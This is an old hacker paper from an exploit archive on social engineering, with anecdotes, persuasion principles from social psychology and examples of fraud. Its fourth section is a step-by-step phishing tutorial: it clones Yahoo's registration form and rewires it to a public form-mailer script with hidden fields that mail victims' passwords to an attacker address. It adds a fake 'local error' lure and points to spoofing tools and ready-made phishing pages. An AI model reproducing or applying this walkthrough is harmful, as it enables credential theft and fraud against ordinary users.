Social Engineering, Definition, True Stories and Examples

EDB-ID:

13200

CVE:

N/A


Author:

Simo

Type:

papers


Platform:

Multiple

Date:

2006-04-08


Author : <Simo/_6mO_HaCk> simo_at_morx_org
Title  : Social Engineering, Definition, true stories and exemples
Date   : 11/22/2002

True stories

a anonymous person called a woman and says he is from her Local 
company customer service and due to a local error some of the 
customers data including Credit Cards and Social Security numbers 
have been deleted. The anonymous person asked the lady then to 
give him again her billing information, including the billing
address,first and last name, the Credit card number, expire date
and social security number that used to be in file before the 
incident. 20 days later the lady received her billing statement 
with 2500 $ to be paid as it was ordered : 1 digital camcorder
1 laptop, 3 mp3 and 2 dvds players. 

it's not always that every hacker is sitting in front his computer
trying to hack into private networks by exploiting vulnerable
servers in order to get private information such as credit cards 
numbers ... sometimes all they do is give it
a call and exploit the humain stupidity

"There's always the technical way to break into a network but 
sometimes it's easier to go through the people in the company. 
You just fool them into giving up their own security," says Keith A. Rhodes,
chief technologist at the U.S. General Accounting Office, which has a 
Congressional mandate to test the network security at 24 different 
government agencies and departments.

Another true story recounted by Kapil Raina, currently a security expert at 
Verisign and co-author of mCommerce Security: A Beginner's Guide, based on
an actual workplace experience with a previous employer

The story said

One morning a few years back, a group of strangers walked into a 
large shipping firm and walked out with access to the firm.s entire
corporate network. How did they do it? By obtaining small amounts
of access, bit by bit, from a number of different employees in that
firm. First, they did research about the company for two days before 
even attempting to set foot on the premises. For example, they learned
key employees. names by calling HR. Next, they pretended to lose 
their key to the front door, and a man let them in. Then they "lost" 
their identity badges when entering the third floor secured area, 
smiled, and a friendly employee opened the door for them. 

The strangers knew the CFO was out of town, so they were able to 
enter his office and obtain financial data off his unlocked computer.
They dug through the corporate trash, finding all kinds of useful
documents. They asked a janitor for a garbage pail in which to place
their contents and carried all of this data out of the building in their 
hands. The strangers had studied the CFO's voice, so they were able
to phone, pretending to be the CFO, in a rush, desperately in need
of his network password. From there, they used regular technical
hacking tools to gain super-user access into the system. 

In this case, the strangers were network consultants performing a
security audit for the CFO without any other employees' knowledge.
They were never given any privileged information from the CFO but
were able to obtain all the access they wanted through social
engineering.

2- Definition

I've readed too many articles of social engineering defining The basic
goals of social engineering, and the different ways used by hackers,
the goal is simply the same as hacking in general; gaining private
information from a humain under some persuasion and influence in order
to perform fraud, espionage, or simply to access a system or a network.
targets can include commercial companies, financial and cultural 
institutions, hospitals or simply a yahoo account :)


3- Persuasion and influence techniques

A substantial body of literature in social psychology demonstrates 
that there are at least six factors relying on peripheral routes to
persuasion that are highly likely to persuade or influence others

Authority : People are highly likely, in the right situation, to be 
highly responsive to assertions of authority, even when the person 
who purports to be in a position of authority is not physically present
A study of three Midwestern hospitals showed how responsive people can
be to such assertions. In the study, 22 separate nurses' stations were
 contacted by a researcher who identified himself (falsely) as a hospital
 physician, and told the answering nurse to give 20 milligrams of a 
specified prescription drug to a particular patient on the ward. Four
 factors should have indicated that the nurses might have questioned
 the order: It came from a "doctor" with whom the nurse had never before
 met or spoken; the "doctor" was transmitting a prescription by telephone,
 in violation of hospital policy; the drug in question was not authorized
 for use on the wards; and the dosage that the "doctor" had specified was
 clearly dangerous, twice the maximum daily dosage. Yet in 95 percent of
 the cases, the nurse proceeded to obtain the necessary dosage from the
 ward medicine cabinet and was on her way to administer it to the patient
 before observers intercepted her and told her of the experiment. 
 
Scarcity : People are also highly responsive to indications that a 
particular item they may want is in short supply or available for
only a limited period. Indeed, research by Dr. Jack Brehm of Stanford 
University indicates that people come to desire that item even more when 
they perceive that their freedom to obtain it is or may be limited in 
some way. The belief that others may be competing for the short supply
of the desired item may enhance the person's desire even more.
Liking and similarity. It is a truly human tendency to like people
who are like us. Our identification of a person as having characteristics
identical or similar to our own -- places of birth, or tastes in sports,
music, art, or other personal interests, to name a few -- provides a 
strong incentive for us to adopt a mental shortcut, in dealing with that
person, to regard him or her more favorably merely because of that similarity.
Reciprocation. A well-recognized rule of social interaction requires that
if someone gives us (or promises to give us) something, we feel a strong
inclination to reciprocate by providing something in return. Even if the
favor that someone offers was not requested by the other person, the person 
offered the favor may feel a strong obligation to respect the rule of 
reciprocation by agreeing to the favor that the original offeror asks in 
return -- even if that favor is significantly costlier than the original favor.
Commitment and consistency. Society also places great store by consistency 
in a person's behavior. If we promise to do something, and fail to carry 
out that promise, we are virtually certain to be considered untrustworthy 
or undesirable. We therefore are more likely to take considerable pains to 
act in ways that are consistent with actions that we have taken before, even 
if, in the fullness of time, we later look back and recognize that some 
consistencies are indeed foolish.One way in which social custom and 
practice makes us susceptible to appeals to consistency is the use of 
writing. A leading social psychologist, Professor Robert B. Cialdini, 
has observed that unless there is strong evidence to the contrary, 
"People have a natural tendency to think that a statement reflects the
true attitude of the person who made it." Moreover, once the person who 
receives such a statement responds by preparing a written statement of 
his own -- whether a letter, an affidavit, or an e-mail -- it tends to 
make the writer believe in what he has written as well, adding to the 
impression that both parties have displayed their true attitudes and beliefs.

Social proof : In many social situations, one of the mental shortcuts on 
which we rely, in determining what course of action is most appropriate, 
is to look to see what other people in the vicinity are doing or saying. 
This phenomenon, known as social proof, can prompt us to take actions that
may be against our self-interest without taking the time to consider them
more deeply. Cults from the Jonestown Temple to Heaven's Gate, for example,
provide cogent evidence of how strong the effects of that phenomenon can be
in the right circumstances.



4- Some ways used by hackers

A- Online applications to Internet-fraud purposes :

E-mails passwords and Credit cards numbers

In this section i'm going to add an influence that have not been notified 
above, which's The influence of "greed" : let's say Someone with an electronic
mail somewhere on the net receives a great e-mail giving him the chance 
to win 10.000 $ or a mercedes 2003 in reward of just entering his password 
and username for verification and registration purposes or sometimes even 
the victim is asked for his credit card and social security number for 
the same purpose. Basicaly this technique is ofen used to steal credit 
cards from online auctions users and web based email accounts

The other classic well known method based on the auhtority influence 
which consists of sending an e-mail with a form asking the victim 
to re-enter his username/password or filling out a new registration 
form due to a local error that erased customers personal information 
including passwords,birth of dates, and secret questions answer. 
In fact the attacker doesnt need to be a good html/java/php programmer to 
code such forms, or simply the attacker doesnt need to bother himself and
waste his time coding html, in this section i'll explain how it's 
easly to make online forms and web server script to get the data and then send
it back to the sender e-mail.

well first of all i know that most of you know how an html post form works and 
how the web server script gets data and then process it but let's get an 
overview with examples

how can an attacker easly make a form in sometimes less than 5 minutes ?

ok, let's say we are interessted in a yahoo account password, in 
that case the attacker chooses the type of influence, the attacker 
decided to take the authority influence, the bad guy goes first to 
mail.yahoo.com and try to sign up a new account, guess what will
 he/she get, a registration form already written
 (http://edit.yahoo.com/config/eval_register?
.v=&.intl=&new=1&.done=&.src=ym&.partner=&.
p=&promo=&.last=so) here we got the form and need 
just to modify some functions. 
The secend step is to get the html source of the page in order to
modify on it, all we have to do is remove
(<FORM name=IOS onsubmit="return hash(this)" 
action=https://edit.yahoo.com/config/register) 
which call the yahoo web script to process the data being sent and put 
our own script http address path, and bellow remove all these arguments 
(used for yahoo script) <INPUT type=hidden 
value=1 name=.save> <INPUT type=hidden value=0 name=.accept> <INPUT type=hidden 
name=.demog> <INPUT type=hidden name=.done> <INPUT type=hidden name=.fam> <INPUT 
type=hidden name=.i> <INPUT type=hidden name=.last> <INPUT type=hidden value=ym 
name=.src> <INPUT type=hidden value=0 name=.regattempts> <INPUT type=hidden 
name=.partner> <INPUT type=hidden name=promo> <INPUT type=hidden name=.ignore> 
<INPUT type=hidden name=.pwtoken> <INPUT type=hidden value=ets8ig8vfdqbg 
name=.u> <INPUT type=hidden value=1 name=.v> <INPUT type=hidden name=.md5> 
<INPUT type=password maxLength=32 name=.pw <INPUT type=password maxLength=32 name=.pw2

and put the appropriate new web server arguments, ok now the next 
step, oh wait i forgot to mention something, if you see carefully 
in the yahoo registration form you will see some extra java actions, 
and since we have added our new webserver address we must remove 
them otherwise our web script is not gonna be called, well let's jump 
to the next part, now that we have modified the form, we need
to make a small php/perl script to proccess the data 
that we wishes to get, so now the attacker got two option, make/download
a pre-made php/perl script and put it on a compromised server, or find a public web mail script
there are thousands of those scripts on the internet 
that are already waiting to serve with no verifications or restrictions
they can be located using any search engine like google or even scanned, but note that the attacker should 
know some scripts names so he/she can perform successfully the search, a well 
known script used often called form2email.pl can be easly located. 
after a search on using google we get a bunch of those, www.alibaweb.net/cgi-bin/services/form2email.pl
as an exemple cool now all we got to do is to include those arguments in the html form: 
        
<input type=hidden name="recipient" value="ATTACKER@E-MAIL.com"> 
This is the attacker e-mail value (where the data will be returned)

<input type=hidden name="subject" value="Successfully hacked">
The e-mail subject

<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT,REMOTE_ADDR">
Victim IP address and hostname (not really needed)

<INPUT TYPE="HIDDEN" VALUE="http://mail.yahoo.com" NAME="redirect">  
Where we want the web mail script to redirect the victim after submiting the form
mail.yahoo.com is ideal since he gotta automatically be redirected into his box
        
<INPUT type=password maxLength=32 name="passwd"
<INPUT type=password maxLength=32 name="passwd2"
Our victim password value, the most important value :]

and finaly the attacker add a message like

<TD><FONT face=arial color=red><B>Due to an involuntary local error your 
informations has been deleted from our database, please take some minutes 
to re-fill the following. Your informations will be immediatly recorded 
after submiting. Thanks. 
</B></FONT>

a pre-coded copy of the above example could be found at :
www.angelfire/linux/simooo/simohackyahoo.html
and example of a perl web based e-mailer can be found also at :
www.angelfire/linux/simooo/emailer.pl

(For educational and demonstration purposes only)

Now all the attacker got to do is to use one of his compromised server to
send the spoofed email to his victim using an email spoofer like htmlbomb.pl which can be found at
www.morx.org/htmlbomb.txt or any program like ghosted.exe for windows which already has
a list of public SMTP server in order included, the attacker spoofed e-mail will look 
like admin@yahoo.com or CService@yahoo.com


influencing the victim could be done in many forms, and many ways trust
authority by sending html forms, attaching backdoors trojans which would give complete
access to the victim computer

A good example of this was an AOL hack, documented by 
VIGILANTe: .In that case, the hacker called AOL.s tech support 
and spoke with the support person for an hour. During the 
conversation, the hacker mentioned that his car was for sale cheaply.
 The tech supporter was interested, so the hacker sent an e-mail attachment 
.with a picture of the car.. Instead of a car photo, the mail executed 
a backdoor exploit that opened a connection out from AOL through the firewall.. 

 
Online auctions :

Here we can say that 3 of the psychological influences mentioned 
above are dominant in these frauds: through the victim's identification 
of someone good that he is prepared to buy immediately at a price he or 
she considers acceptable; reciprocity, through the criminal's promise to 
deliver the ordered goods once the victim has sent payment; and similarity, 
through the victim's willingness to do business with someone who apparently 
shares his or her interests in the collectible or computer merchandise being 
sold.

5- Reverse Social Engineering 

A final, and advanced method of gaining valuable information is 
known as .reverse social engineering.. This is when the hacker 
appears in a position of authority so that employees will ask him 
for information, If analysed, planned and executed well, 
reverse social engineering attacks may offer the hacker an even 
better chance of success


6- Conclusion :

Social Engineering has different ways and purposes, hacking email passwords
credit cards, backdooring and so on, Social Engineering is just unpatched since
humain influence/ignorance/stupidity will keep existing. 


Other References :

http://www.ameritech.com/content/0,3086,92,00.html 

http://www.natlconsumersleague.org/top10net.htm 

http://usatoday.com/life/cyber/tech/cte414.htm 

http://www.it.com.au/jargon/social_engineering.html 

http://www.seas.rochester.edu:8080/CNG/docs/Security/node9.html 

http://www.ciac.org/ciac/notes/Notes03a.shtml#Engineering 

Informatics," http://www.ifi.uio.no/iris20/proceedings/9.htm 

http://www.cert.org/advisories/CA-91.04.social.engineering.html 

http://www.newscientist.com/ns/981031/nspam.html 

http://www.news.com/News/Item/Textonly/0,25,17318,00.html

# milw0rm.com [2006-04-08]